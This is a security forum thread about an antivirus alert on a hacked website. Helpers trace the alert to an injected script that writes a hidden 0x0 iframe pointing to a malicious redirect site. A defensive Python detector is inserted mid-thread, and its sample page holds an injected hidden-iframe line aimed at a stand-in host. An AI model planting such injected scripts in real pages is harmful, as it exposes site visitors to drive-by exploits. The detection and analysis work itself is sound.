False Positive in a Webpage

Hello, every day I go to a page, and today avast! says that it found a trojan ???

This is the page:
hxxp://www.sagastume.com/

This is the detection found:
JS:ScriptIP-inf

I think that it is a false positive because it only detects something on that page after today's update :slight_smile:

If you need more information, just ask me.

Thanks for the help :slight_smile:

Here I get an all clean:
http://scanner.novirusthanks.org/analysis/29227ba496bb1c8cfb1bf4b63a5fe7f2/aW5kZXg

The unpacker also gives benign results; the only thing could be a Facebook issue…
I also get an avast alert here: wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js:

polonus

Wepawet (alpha) - malicious
hxxp://wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js

Hi Pondus,

There are some 75 variants of this malcode around.
That wepawet link is giving an alert for the JS-pdfka BT trojan threat; aliases for Exploit.PDF-JS.Gen (v):
Alias                              Detected by
Bloodhound.Exploit.196             Symantec
Exploit:Win32/Pidief.E             Microsoft
VirTool:JS/Imbarligalgo.gen!A      Microsoft
Virus.JS.Pdfka                     Ikarus
JS:Pdfka-BK                        Avast
Virus.JS.Pdfka!IK                  a-squared
JS:Pdfka-AG                        Avast
JS.Obfus-5                         ClamAV
Troj/PDFJs-P                       Sophos
Exploit.PDF-JS.Gen                 GData
Troj/PDFJs-AH                      Sophos
Exploit.PDF-JS.Gen.C03             nProtect
Description here: http://www.bitdefender.com/VIRUS-1000487-en--Exploit.PDF-JS.Gen.html
Removal instructions: http://www.hkactivity.com/how-to-delete-exploit-pdf-js-gen/
Pondus, please make the link non-clickable with hxtp or wXw.

polonus

So, this is not a False Positive?

The Site was hacked?

My PC isn’t Infected right?

Thanks for the help :slight_smile:

The script tag outside of the closing HTML tag is against standards and as such highly suspect.

See image; the script's document.write line has been broken to make it easier to see.

This script creates a 0x0 iframe tag which points to a malicious site (grepad.com), and it is this script tag and the associated attempt to connect to a malicious site that causes the alert; see image2.

No it isn’t an FP.
It looks like the site was hacked.
Your system shouldn’t be infected as avast blocked it.
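A defender-side check for the pattern DavidR describes above (a script tag sitting after the closing html tag that uses document.write to emit a 0x0, CSS-hidden iframe pointing off-site). This is an added example, not code from the thread or from avast: the sample page and the redirect host example-redirect.invalid are constructed, and the regex-based parsing is a deliberate simplification that assumes the injected markup is built from plain JavaScript string literals joined with "+", with at most \x, \u and backslash escapes to hide the tags.

```python
import re
from urllib.parse import urlparse

# Constructed sample page (not the real site from the thread): a normal page
# followed by an injected <script> after </html>, the pattern DavidR describes.
SAMPLE_HTML = """<html><head><title>Shop</title></head>
<body><p>Welcome</p>
<script src="/js/site.js"></script>
</body></html>
<script>document.write('<ifr' + 'ame src="http://example-redirect.invalid/in.cgi?3"'
 + ' width="0" height="0" style="visibility:hidden"></iframe>');</script>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# One document.write(...) call whose argument is string literals joined by '+'
WRITE_RE = re.compile(
    r"document\.write\s*\(((?:'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"|[^)'\"])*)\)", re.S)
LITERAL_RE = re.compile(r"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\(.)")


def decode_js_literal(body):
    """Undo common JS string escapes (\\x3c, \\u003c, \\', \\\\) used to hide tags."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return m.group(3)
    return ESCAPE_RE.sub(repl, body)


def document_write_markup(script_body):
    """Return the markup each document.write() call in a script would emit."""
    out = []
    for call in WRITE_RE.finditer(script_body):
        parts = [decode_js_literal(a or b) for a, b in LITERAL_RE.findall(call.group(1))]
        out.append("".join(parts))
    return out


def iframe_reasons(attrs):
    """Explain why an iframe's attributes look like a hidden drive-by frame."""
    reasons = []
    if attrs.get("width", "").strip() in ("0", "0px") and attrs.get("height", "").strip() in ("0", "0px"):
        reasons.append("0x0 frame")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by CSS")
    if attrs.get("src", "").lower().startswith(("http://", "https://", "//")):
        reasons.append("points off-site")
    return reasons


def hidden_iframes(markup):
    """Collect iframes in emitted markup that have at least one suspicious trait."""
    found = []
    for tag in IFRAME_RE.finditer(markup):
        attrs = {k.lower(): (v1 or v2 or v3) for k, v1, v2, v3 in ATTR_RE.findall(tag.group(1))}
        reasons = iframe_reasons(attrs)
        if reasons:
            found.append({"src_host": urlparse(attrs.get("src", "")).hostname, "reasons": reasons})
    return found


def scan(html):
    """Flag scripts that inject hidden iframes and note whether they sit after </html>."""
    findings = []
    tail_start = html.lower().rfind("</html>")
    for m in SCRIPT_RE.finditer(html):
        after_html = tail_start != -1 and m.start() > tail_start
        for markup in document_write_markup(m.group(1)):
            for frame in hidden_iframes(markup):
                frame["after_html"] = after_html
                findings.append(frame)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML):
        print(finding)
```

Run against a saved copy of a page rather than the live site, so nothing is fetched from the suspect host; a finding with after_html set and a 0x0, hidden frame pointing to a host the site has no business loading is the combination DavidR's post singles out, and the src_host field is what to hand to a URL scanner next.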

Hi Light Archangel,

As you were alerted by the avast shield and it disconnected from the site, you are not infected.
Malicious software includes 7 exploit(s), 4 trojan(s) on the redirect site…
To be fully protected against all malcode that could enter a browser, use a browser like Firefox with the NoScript extension and the RequestPolicy extension installed to have all these issues blocked, and allow only what you need when you visit a site.

polonus

This script creates a 0x0 iframe tag which points to a malicious site (grepad.com), and it is this script tag and the associated attempt to connect to a malicious site that causes the alert; see image2.
And that site has this result: Wepawet (alpha) - malicious hxxp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js

I'm using Firefox (it is my default browser).
I have the WOT + NoScript add-ons.

I allowed the scripts of that page because I go there every day. :slight_smile:
This did not happen yesterday…
For that reason I thought that it was a false positive.

avast protected my computer very well then!! ;D

My PC is fine; I have had no virus since I installed avast!
Now I'll be looking for a site similar to sagastume.com.

I'll try to warn all my friends that use that site too…

Thanks to all for your replies.

So long my friends :wink:

Hi DavidR,

What malware do we detect for the grepad.com link hxtp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js ?
I did not pass the above link directly, because avast would flag it…
Adobe util.printf overflow
Adobe getIcon
Office OCX OpenWebFile
AppStream LaunchObj
Hummingbird PerformUpdateAsync
Peachtree ExecutePreferredApplication
C6 propDownloadUrl

polonus

Yes, I tend not to get too carried away going to the next level down, etc., once it is reasonably clear that the site has been hacked/infected, etc., and the avast detection was good.

Hi DavidR,

This could also have given these results: http://stopbadware.org/reports/142c1e4fd471f4de9e6beea72b96fb17

polonus

Again, I try to stick with what is actually on the site (where the detection was made) if that can determine that the detection is good; life is too short for detailed delving, and once it is confirmed I stop.